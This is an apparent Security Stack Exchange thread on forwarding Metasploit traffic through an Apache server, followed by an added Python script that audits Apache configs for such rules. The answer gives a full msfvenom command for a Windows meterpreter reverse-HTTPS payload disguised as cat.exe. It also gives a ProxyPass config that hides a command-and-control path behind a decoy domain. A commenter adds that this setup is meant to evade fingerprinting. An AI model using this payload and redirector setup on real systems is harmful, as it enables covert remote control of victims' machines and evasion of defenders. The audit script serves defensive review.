Forward Metasploit Requests to another IP

1

I'd like to set up a static Apache webserver at home that forwards all incoming Metasploit connections to another IP. Is this possible? If so, how? I am looking to run the Apache server on a RasPi B+ if that helps.

Andonis Gothorp

Posted 2018-05-03T03:35:10.190

Reputation:

4Welcome to Security SE! Can you provide more information about what you are trying to accomplish? – multithr3at3d – 2018-05-03T03:49:05.587

Building off the comment @multithr3at3d made, it’s unclear what you’re attempting. Apache is a webserver, and will only be able to redirect web traffic on the specific port, so it will not be able to redirect all “metasploit connections” to remote hosts. However, if you have the Metasploit web UI running, and you simply want to send UI web traffic to a different webserver, I would recommend using an Nginx reverse proxy. – SuperAdmin – 2018-05-03T03:57:31.237

@schroeder Not OP here but usually a valid Apache or nginx server is configured in front for two purposes: to forward requests of separate campaigns to separate C&C servers, and to masquerade the requests as going to legitimate HTTP servers to avoid fingerprinting. – None – 2018-05-03T15:46:26.747

@void_in yeah, the fingerprinting angle makes a lot of sense, actually – schroeder – 2018-05-03T16:28:50.860

Answers

2

First, create the payload:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

The most important part is the LURI which you need to set to a specific resource. All the traffic generated by the payload will be directed towards this URI.

Once this is complete, use the ProxyPass directive in either Apache or nginx to forward only the traffic of /myawesomecnc to the specific host you want. Here is an example of Apache:

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

void_in

Posted 2018-05-03T03:35:10.190

Reputation: 121
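For administrators reviewing a web server for forwarding rules like the one in the answer above, the following added example (not part of the original answer) parses an Apache configuration and lists `ProxyPass` rules that forward a single URI path, name the backend by IP address, or hand TLS traffic to plain HTTP. The function names, flag names and the second vhost are assumptions made for illustration; a flag marks a rule for review, not as malicious.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# First vhost: the config from the answer. Second vhost: constructed for contrast.
SAMPLE_CONF = """\
<VirtualHost *:443>
  ServerName www.totallyharmless.com
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
</VirtualHost>
<VirtualHost *:443>
  ServerName intranet.example.test
  ProxyPass / https://app.internal.example.test/
</VirtualHost>
"""

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_proxypass(conf_text):
    """Return one dict per ProxyPass rule that carries at least one review flag."""
    findings, port, name = [], None, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"<VirtualHost\s+\S*?:(\d+)\s*>", line, re.I)
        if m or line.lower().startswith("</virtualhost"):
            port, name = (int(m.group(1)) if m else None), None
            continue
        parts = line.split()
        if parts[0].lower() == "servername" and len(parts) > 1:
            name = parts[1]
        elif parts[0].lower() == "proxypass" and len(parts) >= 3 and parts[2] != "!":
            path, backend, flags = parts[1], urlsplit(parts[2]), []
            if path.strip("/"):
                flags.append("single-path")       # only one URI prefix is forwarded
            if is_ip_literal(backend.hostname or ""):
                flags.append("ip-backend")        # backend given as an address
            if port == 443 and backend.scheme == "http":
                flags.append("tls-to-cleartext")  # TLS front end, plain HTTP behind it
            if flags:
                findings.append({"vhost": name, "path": path,
                                 "backend": parts[2], "flags": flags})
    return findings
```

Calling `audit_proxypass(SAMPLE_CONF)` reports the first vhost's rule with all three flags and nothing for the second.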